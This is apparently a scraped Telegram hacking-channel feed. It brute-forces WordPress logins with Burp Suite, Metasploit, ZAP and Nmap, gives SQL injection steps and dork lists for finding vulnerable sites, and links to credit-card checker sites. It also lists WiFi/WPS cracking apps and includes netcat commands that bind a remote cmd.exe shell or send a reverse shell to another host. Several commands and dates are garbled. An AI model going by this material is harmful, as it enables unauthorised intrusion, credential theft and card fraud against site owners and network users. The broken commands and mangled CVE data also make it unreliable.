UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Burp Suite violent attacks for wordpress :
fb.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) make Burp Suite work properly, first of all, we need to open the manual proxy, then go to Settings ( Settings ) and select "Preferences" ( the Preferences ).

2) Then select the advanced (advanced) option, go further to the network ( Network ), and then select the settings ( settings ) .
Description: Practical penetration tool: 5 ways to use Burpsuite to brute force WordPress

3) Now, choose Manual Proxy Configuration ( Manual Proxy the Configuration ) Type your local host address in the HTTP Proxy tab, and the port is set to 8080. Click OK

4) Now open WordPress on your computer and it will ask for your username and password. Here, start the burp suite before giving the username and password and select the Proxy tab and turn on interception by clicking the Interception on on / off button.

5) When you turn on interception, then type in any password predicted so that the burp suite can capture it. Look at the image. Please note that the last line to get the data shows that I tried to log in as the username and password by type admin: admin .

6) Space by right-clicking and select Send to Intruder option or just press ctrl + i captured material sent to the intruder ( Send to Intruder )

7) Now open Intruder tab, then select the Positions tab without disturbing data click on the right side of the frame clear button ( the Clear the Button ) .


8) now click the right side of the frame Add button ( the Add the Button ) . This configures where to insert the payload into the basic request.

9) Select the attack type to determine how to distribute the payload to the payload location. I will choose a cluster bomb ( cluster bomb ), because the number of payload sets depends on the type of attack, we have 2 payload locations. Click to start attacking ( Start Attack ).

10) Click payload set ( payload SET ) , the two numbers 1 and 2 show, for the first payload position of the number 1 . Click the further payload option ( payload the Option ) in the load button , and configure the payload as a simple list of strings, or only add any path name of the user dictionary.

> Similarly, select the number 2 for another payload location and add any password-only dictionary path. Click to start attacking ( Start Attack ) . Now the brute force attack will match the combination of the two payloads and try to log in with a username and password. When the attack is over, you will obtain certain credentials by checking the status and length , which will be different from other combinations. From the result user: bitnami is the username and password respectively .

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Use metasploit for brute force wordpress attacks :

1) This module will test a series of WordPress logins on computers and report successful logins. If you have loaded the database plugin and connected to the database of this module, it will record successful logins and hosts so that you can track your visits.
msf>useauxiliary/scanner/http/wordpress_login_enummsfauxiliary(wordpress_login_enum)>setrhosts192.168.1.4msfauxiliary(wordpress_login_enum)>setrport80msfauxiliary(wordpress_login_enum)>setuser_file/root/


2) Desktop / user . Txt
msf auxiliary ( wordpress_login_enum ) > set pass_file / root / Desktop / pass . Txt msf auxiliary ( wordpress_login_enum ) > exploit WordPress brute force successfully logged in the user

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Hack wordpress number 3:
> Use OWASP ZAP for brute force attacks

1) Zap is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. Now we will use this tool for brute force attacks, the entire process is the same as the burp suite.

2) Start OWASP ZAP and open the manual proxy, then go to Settings ( Settings ) and select "Preferences" ( the Preferences ). Then select the advanced ( advanced ) option, go further to the network ( Network ), and then select the settings ( Settings ) .

3) Select Manual proxy configuration . Type your local host address ( localhost address ) in the HTTP proxy tab and set the port to 8080. Click OK. Now open WordPress in your computer again, it will predict the username and password .

>It will capture the data,

> You can see it in the "Request" section of the tool and select the characters you entered on the page before, only select the password from the extracted data, and then use the right-click to make the blur option

4) When you click fuzzy, new window " blur filter ( Fuzzer )" will open, now you must click on the left side of the frame Add button ( the Add the Button ) , will open a new window to add a payload ( the Add payload . ) . Click select ( selec t ) and select your dictionary to attack. Click the " Add Add" button again , and then click " Start fuz zer

5) After starting the fuzz test again, a new screen will open, click the option button and click the first radio button to show the payload replacement strategy in depth . Select the concern redirection ( the Follow redirects ) check box, and then click start fuzzing ( Start Fuzzing ).

6) When the attack is over, you will by checking the state ( State ) and the size of the response headers ( size Response header ) obtaining a determined certificate, which will be different from the rest of the combinations.
From the result bitnami is the password of the logged in user .

πŸ¦‘another WordPress attack :

> Brute force attack using Nmap

This script uses unpwdb and brute library to perform password guessing. Use the vault to store any successful guesses.
Follow the Nmap command to open the Kali terminal type
nmap–sV-scripthttp-wordpress-brute-script-args' userdb = / root / Desktop / login.txt, passdb = / root / Desktop / pass.txt, http-wordpress- brute.hostname = domain.com, http-wordpress-brute.thread = 3, brute.firstonly = true '192.168.1.17

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
12) CVE-2018-20153 79 XSS 2018-12-14 2019-01-04 3.5 None Remote Medium Single system None Partial None
In WordPress before 4.9.9 and 5.x before 5.0.1, contributors could modify new comments made by users with greater privileges, possibly causing XSS.
13 CVE-2018-20152 20 Bypass 2018-12-14 2019-01-04 5.0 None Remote Low Not required None Partial None
In WordPress before 4.9.9 and 5.x before 5.0.1, authors could bypass intended restrictions on post types via crafted input.

14) CVE-2018-20151 200 +Info 2018-12-14 2019-01-04 5.0 None Remote Low Not required Partial None None
In WordPress before 4.9.9 and 5.x before 5.0.1, the user-activation page could be read by a search engine's web crawler if an unusual configuration were chosen. The search engine could then index and display a user's e-mail address and (rarely) the password that was generated by default.

15) CVE-2018-20150 79 XSS 2018-12-14 2019-01-04 4.3 None Remote Medium Not required None Partial None
In WordPress before 4.9.9 and 5.x before 5.0.1, crafted URLs could trigger XSS for certain use cases involving plugins.

16) CVE-2018-20149 79 XSS Bypass 2018-12-14 2019-01-04 3.5 None Remote Medium Single system None Partial None
In WordPress before 4.9.9 and 5.x before 5.0.1, when the Apache HTTP Server is used, authors could upload crafted files that bypass intended MIME type restrictions, leading to XSS, as demonstrated by a .jpg file without JPEG data.

17) CVE-2018-20148 502 2018-12-14 2019-01-04 7.5 None Remote Low Not required Partial Partial Partial
In WordPress before 4.9.9 and 5.x before 5.0.1, contributors could conduct PHP object injection attacks via crafted metadata in a wp.getMediaItem XMLRPC call. This is caused by mishandling of serialized data at phar:// URLs in the wp_get_attachment_thumb_file function in wp-includes/post.php.

18) CVE-2018-20147 287 Bypass 2018-12-14 2019-10-02 5.5 None Remote Low Single system None Partial Partial
In WordPress before 4.9.9 and 5.x before 5.0.1, authors could modify metadata to bypass intended restrictions on deleting files.

19) CVE-2018-14028 434 Exec Code 2018-08-10 2018-10-10 6.5 None Remote Low Single system Partial Partial Partial
In WordPress 4.9.7, plugins uploaded via the admin area are not verified as being ZIP files. This allows for PHP files to be uploaded. Once a PHP file is uploaded, the plugin extraction fails, but the PHP file remains in a predictable wp-content/uploads location, allowing for an attacker to then execute the file. This represents a security risk in limited scenarios where an attacker (who does have the required capabilities for plugin uploads) cannot simply place arbitrary PHP code into a valid plugin ZIP file and upload that plugin, because a machine's wp-content/plugins directory permissions were set up to block all new plugins.

20) CVE-2018-12895 22 Exec Code Dir. Trav. 2018-06-26 2018-08-20 6.5 None Remote Low Single system Partial Partial Partial
WordPress through 4.9.6 allows Author users to execute arbitrary code by leveraging directory traversal in the wp-admin/post.php thumb parameter, which is passed to the PHP unlink function and can delete the wp-config.php file. This is related to missing filename validation in the wp-includes/post.php wp_delete_attachment function. The attacker must have capabilities for files and posts that are normally available only to the Author, Editor, and Administrator roles. The attack methodology is to delete wp-config.php and then launch a new installation process to increase the attacker's privileges.

21) CVE-2018-10102 79 XSS 2018-04-16 2018-05-18 4.3 None Remote Medium Not required None Partial None
Before WordPress 4.9.5, the version string was not escaped in the get_the_generator function, and could lead to XSS in a generator tag.
22) CVE-2018-10101 601 2018-04-16 2018-06-02 5.8 None Remote Medium Not required Partial Partial None
Before WordPress 4.9.5, the URL validator assumed URLs with the hostname localhost were on the same host as the WordPress server.


23) CVE-2018-10100 601 2018-04-16 2018-05-18 5.8 None Remote Medium Not required Partial Partial None
Before WordPress 4.9.5, the redirection URL for the login page was not validated or sanitized if forced to use HTTPS.

24) CVE-2018-6389 399 DoS 2018-02-06 2018-03-05 5.0 None Remote Low Not required None None Partial
In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.


25) CVE-2018-5776 79 XSS 2018-01-18 2018-02-01 4.3 None Remote Medium Not required None Partial None
WordPress before 4.9.2 has XSS in the Flash fallback files in MediaElement (under wp-includes/js/mediaelement).


26) CVE-2017-1001000 2017-04-02 2019-10-02 5.0 None Remote Low Not required None Partial None
The register_routes function in wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php in the REST API in WordPress 4.7.x before 4.7.2 does not require an integer identifier, which allows remote attackers to modify arbitrary pages via a request for wp-json/wp/v2/posts followed by a numeric value and a non-numeric value, as demonstrated by the wp-json/wp/v2/posts/123?id=123helloworld URI.

27) CVE-2017-1000600 20 Exec Code 2018-09-06 2018-10-26 6.5 None Remote Low Single system Partial Partial Partial
WordPress version <4.9 contains a CWE-20 Input Validation vulnerability in thumbnail processing that can result in remote code execution. This attack appears to be exploitable via thumbnail upload by an authenticated user and may require additional plugins in order to be exploited however this has not been confirmed at this time. This issue appears to have been partially, but not completely fixed in WordPress 4.9

28) CVE-2017-17091 330 Bypass 2017-12-02 2019-10-02 6.5 None Remote Low Single system Partial Partial Partial
wp-admin/user-new.php in WordPress before 4.9.1 sets the newbloguser key to a string that can be directly derived from the user ID, which allows remote attackers to bypass intended access restrictions by entering this string.


29) CVE-2017-16510 89 Sql 207-11-02 2018-02-03 7.5 None Remote Low Not required Partial Partial Partial
WordPress before 4.8.3 is affected by an issue where $wpdb->prepare() can create unexpected and unsafe queries leading to potential SQL injection (SQLi) in plugins and themes, as demonstrated by a "double prepare" approach, a different vulnerability than CVE-2017-14723.

30) CVE-2017-14990 312 Sql 2017-10-02 2019-10-02 4.0 None Remote Low Single system Partial None None
WordPress 4.8.2 stores cleartext wp_signups.activation_key values (but stores the analogous wp_users.user_activation_key values as hashes), which might make it easier for remote attackers to hijack unactivated user accounts by leveraging database read access (such as access gained through an unspecified SQL injection vulnerability).


▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ List & details recently & top wordpress vulnerabilities
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Infiltration tool combat: Sqlmap and Burp Suite for Sql injection attack (Burp CO2 plugin)
instagram.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Burp CO2 is an extension of the popular web proxy / web application testing tool called Burp Suite provided by Portswigger. Before installing the Burp CO2 extension, you must install Burp Suite.

2) The CO2 extension includes various functions to enhance certain web penetration testing tasks, such as a more efficient and error-free interface to interact with SQLMap, various tools for generating user lists, a Laudanum development shell implementation, and even a word masher is used to generate passwords.

πŸ¦‘ how to get the sqlmap command through burp suit for SQL injection?


1) Start hiccup suit, click on the expansion tab, then click on the cans hiccup extension on the BAPP store to expand the hiccup ability.
Now select CO2 and click on the available button box on the right sideof the installation .

2) From a given increase in CO2 screenshot you can see the extension on the menu bar now click of CO2 , and then select SQLMappe R tool

3) Now open DVWA in your computer and log in with the following credentials:
username -admin
password -password

4) Click DVWA Security and set the website security level to low
Select SQL Injection from the list of vulnerabilities to attack Type the user ID in the text box : ' .

5) Do not set the browser proxy, please do not click the submit button. Set the browser proxy to make the burp suite work properly. Go to burp suite, click the agent in the menu bar , and then go to the button to intercept . Come back and click the submit button in dvwa .

6) The "Intercept" button is used to display HTTP and Web socket messages passed between the browser and the Web server. Now right-click on its window and you will see a list of many operations that have been opened, then select the option to send to SQLMapper .

7) When the acquired data is sent to sqlmapper, it will automatically generate a sqlmap command using referrer and cookie . Here you can see the option box at the end of the burp suite framework . Now, click on the tabs listed above and select the checkboxes database, table, column, username and password . Now copy the sqlmap command from the text field and use sqlmap to manually run this command on the terminal

8) Open the terminal and paste the above command in front of "sqlmap" Now run this command to get the database information

Written by Undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Oday Vulnerability Injection Comprehensive Utilization Tool can be set according to the module to be detected the back page:

1) dedecms default background page: / dede / add something else you can own, not too many
pages feature can be set to: <the INPUT of the type = "text" name = "userid"

2) ctscms default page background: / ctscms / can also add their own something else, not too many
pages feature can be set to: <input type = "text" name = "userid" because it is the same here dede kernel development

3) easy to want to buy back the default page: /admin.php can also add their own something else, not too many
pages feature can be set to: /verify.php "the above mentioned id =" the Verify "
Oday injection vulnerability keyword:
inurl: Article This article was.
inurl: coupon.php city = (Local Business with the word)?

4) phpweb default background page: / admin / add something else you can own, not too many
pages feature can be set to: Log </ title> This is not Ok, it seems that the changes are relatively large.

The address of phpweb must be a page (https: // xx / sfsfsfs) not a doman (https://test ...com), you can use the following keywords,
oday vulnerability injection keywords:
inurl: webmall / query.php? typeid = ?
inurl: shop / class /? 226.html
inurl: product / html /? 10.html
inurl: down / class /? 2.html
inurl: news / html /? 417.html
inurl: shop / html /? 477. HTML
inurl: News / class / 86.html?

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘CC CHECKER WEBSITES :
t.me/UndercodeTesting

> https://checkz.net/

> https://bin-checker.net/

> https://codebeautify.org/credit-card-validate

> https://www.mobilefish.com/services/credit_card_number_checker/credit_card_number_checker.php

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ wifi hacking tutorIALS @ UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Preparation before using WiFi hacking application android :


πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

> Before you start using these apps, it is important to understand some basic settings that can be done on an Android device. Because of these tips, you can transform your Android system into a mature Linux operating system:

1) Root your android device;

2) Check if the device is running Android 4.0 or higher;

3) The WiFi network of the device shows that WPS is available (indicating that the wireless device supports WPS encrypted connection) is very important;

4) The signal strength of the target WiFi network is good enough.
Through this list, you will be able to crack various WPS PIN codes on any WiFi network.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ BEST TESTED WIFI HACKING APPS & TOOLS FOR ANDROID :
T.me/undercodeTesting


1) WPA WPS Tester

The WPA / WPS tester is one of the most popular Wi-Fi hacking tools on Android. It was developed to scan for vulnerabilities in Wi-Fi networks. This hacking application is known for its ability to break security.

The application uses a WPS PIN connected access point for testing, and uses various algorithms (such as Blink, Asus, Zhao, and Arris, etc.) to perform calculations. This application requires Android 4.0 and above to run. This is not a cross -platform application and can only be used on Android devices.

The app is available in the Google Play store, and it can help you hack any WiFi network that shows WPA / WPS is available. Once the network key is recognized, the application will display it on the screen, which shows that it can easily help you perform hacking operations.

Portal:

https://play.google.com/store/apps/details?id=com.tester.wpswpatester&hl=en

2) aircrack-ng

When it comes to the most commonly used and most famous WiFi hacking tool, Aircrack may be counted. This WiFi hacking software written in C language is a combination of a large number of tools, which can be used for monitoring, attacking, penetration testing and cracking tasks, using aircrack-ng

Software, you can crack 802.11 WEP and WPA-PSK keys after capturing enough packets.

Aircrack first captures network packets and then analyzes the packets to recover the network password. After performing optimizations (including KoreK attacks and PTW attacks) to recover or crack passwords, the application can also perform standard FMS attacks.

Optimize the use of attacks to make the entire cracking process much faster than other WEP password hacking tools. However, you may find that the tool compatible with this console interface is a little more complicated when you start using it. For this, we recommend that you check the online tutorial of the application before using it.

Github entrance:

https://github.com/kriswebdev/android_aircrack

XDA-developers entrance:

https://forum.xda-developers.com/showthread.php?t=2338179

3)Kali Linux Nethunter

The recommended list without Kali Linux Nethunter is not a complete list. Does anyone know Kali Linux Nethunter because it is one of the best WiFi hacking apps. This tool is Offensive Security's first open source Android penetration testing platform. To use this hacking application, you need to start Kali's Wifite tool to perform this process.

Nethunter's user-friendly configuration interface allows you to handle complex configuration files effortlessly, and its custom kernel supports all 802.11 wireless protocols. For the Android system, it is indeed a necessary WiFi hacking tool.

You can use Kali Linux to perform various activities, such as network mapping, network control, and wireless injection. It can also be used to perform USB HID keyboard attacks.

Portal:

https://www.kali.org/kali-linux-nethunter/

4) Zanti

Zanti is a popular hacker application released by Zimperium, which allows security administrators to analyze the level of risk in the network. This easy-to-use mobile penetration toolkit can be used for Wi-Fi network evaluation and penetration.

The app's Wi-Fi scanner shows the known default key configuration as a green access point. You can also use the application to kill connections to prevent the target from accessing any website or server. In addition, using the Zanti tool, you can also understand the mirroring methods used by cyber attackers to identify vulnerabilities in the network and implement the necessary security measures accordingly.

You can think of zANTI as an application that can bring the power of Backtrack to your Android device. As long as you log in to zANTI, it will map the entire network and sniff the cookies in it to grasp the various websites that have been visited before-thanks to the ARP cache in the device. Various modules in the application include network mapping, port discovery, sniffing, packet tampering, DoS, MITM, etc.

Portal:
https://www.zimperium.com/zanti-mobile-penetration-testing

5) Nmap

Nmap for Android is a very useful application. It can be used to steal Wi-Fi and view available hosts, services, data packets and firewalls. In addition, Nmap is useful for Android devices with and without root. However, keep in mind that users without roots cannot use advanced features such as SYN scanning and operating system fingerprints. The developers of this Wi-Fi hacking application have shared the compiled binary version of Nmap and support OpenSSL. Nmap can also be used on Windows, Linux and other platforms.

Portal:

https://github.com/kost/nmap-android/releases

6) Kismet (the best desktop WiFi hacking app of 2018)

Kismet is an excellent open source WiFi 802.11 a / b / g / n layer 2 WiFi sniffer application. The tool can be used for intrusion detection, and is also very suitable for wireless network troubleshooting, and is compatible with any rfmon mode. WiFi card compatible. You can also use it on a variety of desktop platforms, including windows, BSD, Mac OSX and Linux.

Kismet can display detailed AP information, including hidden SSIDs, and can also capture raw wireless data packets. It can also import data into tools such as Wireshark and TCPdump for analysis. The application is designed for a client-server modular structure, so it can easily detect 802.11b, 802.11a, 802.11g, and 802.11n traffic.

Portal:

http://www.kismetwireless.net/download.shtml

7) Cain & Abel

In order to crack wireless network passwords on desktop computers, Cain & Abel is a reliable tool developed to intercept network traffic. Once the traffic is intercepted, it uses brute force attacks to identify the password. In addition, Cain & Abel can also identify wireless networks by scanning routing protocols, so it can be used to crack different types of passwords.

Of course, it is not only a popular WEP cracking tool, but also very suitable for Windows password cracking. In fact, if you are looking for a password cracking tool specifically for the Microsoft Windows operating system, Cain & Abel may be the best choice . This tool, named after the sons of Adam and Eve, can use different methods to identify passwords, such as network packet sniffing, and can also perform brute force algorithms, dictionary attacks, and password analysis.

That's not all. With the Windows wifi hacking software, you can record VoIP conversations, decode messy passwords, get cached data, and get routing protocols. The latest feature of this powerful tool is ARP support for sniffing switched LANs and man-in-the -middle (MitM) attacks.

Portal:

http://www.oxid.it/cain.html

8) Wireshark

Wireshark is undoubtedly the most famous network protocol analyzer, you can use this tool to check the wireless connection of different aspects such as home or office network. For example, you can capture and analyze data packets by examining data at the micro level to identify certain things related to Wi-Fi networks.

The Wireshark tool is suitable for all mainstream platforms, including Windows, Linux, OS X, BSD, etc. Although it will not directly help you recover the clear text password, it can help you sniff the packets in the best way. This software can help you check hundreds of protocols and get the best results through real-time capture and offline analysis.

Wireshark can capture not only wireless data, but also real-time data such as Bluetooth, Ethernet, USB, Token Ring, and FDDI. However, we recommend that you understand some basic knowledge about the network and protocols before using the Wireshark tool. Otherwise, you may find that the tool is difficult to use.

Portal:

https://www.wireshark.org/

9) Fern WiFi Wireless Cracker

Fern WiFi Wireless Cracker tool can be used to analyze your web host and traffic in real time to ensure maximum security. At the same time, the application can also be used to identify and repair vulnerabilities in computer networks, it is also applicable to all mainstream desktop operating system platforms, including MS Windows, OS X and Linux.
This hacker program written in Python language can run a variety of network attacks on Ethernet and wireless networks. Its main highlights are WEP / WPA / WPA2 / WPS cracking, session hijacking, man-in-the-middle attacks, brute force cracking, etc . In order to crack WPA / WPA2, the tool will use WPS-based dictionary attacks; and for WEP cracking, the tool will use Hirte, ARP request replay, Fragmentation, Chop-Chop, Caffe-Latte or WPS attacks.

The tool is currently under further development, and is being updated, Fern's professional version (Pro) is available, but the function is not as advanced as this version.

Portal:

http://www.fern-pro.com/downloads.php

10) CoWPAtty

CoWPAtty is an automated dictionary attack tool used to crack passwords based on WPA-PSK networks. It is compatible with the Linux operating system. The new version presets 170,000 dictionary files containing thousands of popular SSIDs, greatly improving the cracking speed, but the command line interface of CoWPAtty is very mediocre. If the password is recognized in the word list, then the tool can successfully crack it.

Its outstanding disadvantage is that it runs too slowly because it must scan thousands of passwords, and because its hash uses SHA q with SSID seed, which means that the same password will have different SSIM. The WiFi hacking tool uses a password dictionary and SSID to generate a hash for each word in the dictionary.

Currently, the running speed problem has been solved in the latest version of CoWPAtty because it uses pre-computer hash files to prevent calculations during the cracking process. Currently, there are about 17,000 dictionary files for 1000 popular SSIDs, but for the attack to succeed, your SSID must be on the list.

Portal:

http://sourceforge.net/projects/cowpatty/

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ MORE THAN 50 DIFFERENT HACKING TIP-OR TOOL + USAGE BY UNDERCODE 😁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁


πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :


1) Nessus is the main tool for scanning UNIX vulnerabilities, and then lives in Windows. The main functions include local and remote security review, support client / server structure, with GTK graphical interface, and support scripting language to write plug-ins. It is free and open source.

2) Second, Wireshark Speaking of Wireshark, I have to mention Ethereal, Ethereal and Windows' sniffer pro and call the network sniffer tool two heroes, but unlike sniffer pro, Ethereal is more widely used in Linux-based systems. Wireshark is the follow-up version of Ethereal. It is the latest network sniffer software launched after Ethereal was acquired. It is a powerful network data capture tool that can analyze network data traffic and find worms, Trojan horses, and ARP spoofs in the first place. The root of the problem.

3) Snort Snort is free and cross-platform, used as a sniffer, log record, and intrusion detector for monitoring small TCP / IP networks. Can run linux / UNIX and Win, snort has three working modes: sniffer, packet recorder, network intrusion detection system.

In the sniffer mode, snort reads packets from the network and displays them on the console. For example, to print TCP / IP packet header information on the screen, you need to enter the command: snort -v

πŸ¦‘4) Netcat
netcat is known as the 'Swiss Army Knife', a simple and useful tool that reads and writes through a network connection using TCP or UDP protocol data. It is designed as a stable backdoor tool and a powerful network debugging and detection tool.


1) Example: Command to connect to the TCP80 port of 192.168.xx: nc -nvv 192.168.xx 80

2) Monitor the TCP80 port of the machine: nc -l -p 80

3) Scan all ports from 192.168.xx TCP80 to TCP445 : Nc -nvv -w2 -z 192.168.xx 80-445

4) CMDSHELL bound to REMOTE host is bound to SHELL on TCP5354 port of REMOTE host REMOTE host is bound to: nc -l -p 5354 -t -ec: \ winnt \ system32 \ cmd.exe

5) REMOTE host binds SHELL and connects in reverse, for example: command to bind CMDSHELL of REMOTE host and connect to TCP5354 port of 192.168.xx in reverse: nc -t -ec: \ winnt \ system32 \ cmd exe 192.168.xx 5354

6) Used as an attack program, for example: connect to port 80 of 192.168.xx and send 'c: \ exploit.txt' content in its pipeline:
format 1: type.exe c: \ exploit. txt | nc -nvv 192.168.xx 80
format 2: nc -nvv 192.168.xx 80 <c: \ exploit.txt

7) Used as a honeypot, for example: use '-L' (note that L is uppercase) can continue to listen to a certain port until ctrl + c
Format: nc -L -p 80
πŸ¦‘ Metasploit Framework

> is a writing, A perfect environment for testing and using exploit code. This environment provides a reliable platform for penetration testing, shellcode writing, and vulnerability research. This framework is mainly written in the object-oriented Perl programming language, with optional components written in C, assembler, and Python. As an auxiliary tool for buffer overflow testing, Metasploit Framework can also be said to be a vulnerability exploitation and testing platform. It integrates common overflow vulnerabilities and popular shellcodes on various platforms, and is constantly updated, making buffer overflow testing convenient and simple.

6) Hping2
Hping2: A network detection tool, a super variant of ping, this gadget can send custom ICMP, UDP and TCP data packets, and receive all feedback information. For example, you can set the time interval, the frequency of data packets sent (-i uX X is microseconds), the command is: hping2 192.168.0.1 -c 2 -i u1000

7) Kismet
Kismet is a Linux-based wireless network scanner, a very convenient tool to find the target WLAN by measuring the surrounding wireless signals. When Kismet starts to run, it will show that it has found all wireless LANs in this area. The SSID value of the AP in the WLAN is displayed in the "Name" column. In a row, the value of the CH column (channel used by the AP) should be the same as the one noted at the beginning. The information displayed on the far right of the window is the number of WLANs discovered by Kismet, the number of data packets that have been captured, the number of data packets that have been encrypted, and so on. Even when the target computer is turned off, Kismet can detect packets from our target AP. This is because the target AP keeps sending out "beacons", it will tell the computer with a wireless network card that there is an AP in Within this range.

8) Tcpdump TcpDump
based on Linux can completely intercept the "header" of the data packets transmitted in the network to provide analysis. It supports filtering for network layer, protocol, host, network or port, and provides logical statements such as and, or, not to help you remove useless information. tcpdump is a free network analysis tool, especially it provides source code and exposes interfaces, so it has strong scalability and is a very useful tool for network maintenance and intruders.

9) Cain and Abel
It is a password recovery tool under Windows platform. It recovers multiple passwords by using various methods, including: sniffing the network, using dictionary, brute force, and password analysis methods to crack the decrypted password, record the VoIP session, decode the promiscuous password, recover the wireless network key, and reveal the password box Enter the password (view with an asterisk) to disclose the buffered password and analyze the routing protocol. This tool does not take advantage of any software vulnerabilities or flaws. It takes advantage of the security problems and inherent weaknesses of the protocol standards, authentication methods, and buffering mechanisms themselves. Its main purpose is to simply recover passwords and credentials for various programs. The software consists of two parts: Cain and Abel. Cain (Cain.exe) is the main graphical interface of the program. Abel is a Windows service consisting of the files Abel.exe and Abel.dll.

10) John the Ripper is
a cracking password software used to try to crack the plain text when the cipher text is known. The latest version is currently version 1.4 of JOHN, which mainly supports the cracking of ciphertexts with DES and MD5 encryption methods. It can work on many different models and many different operating systems.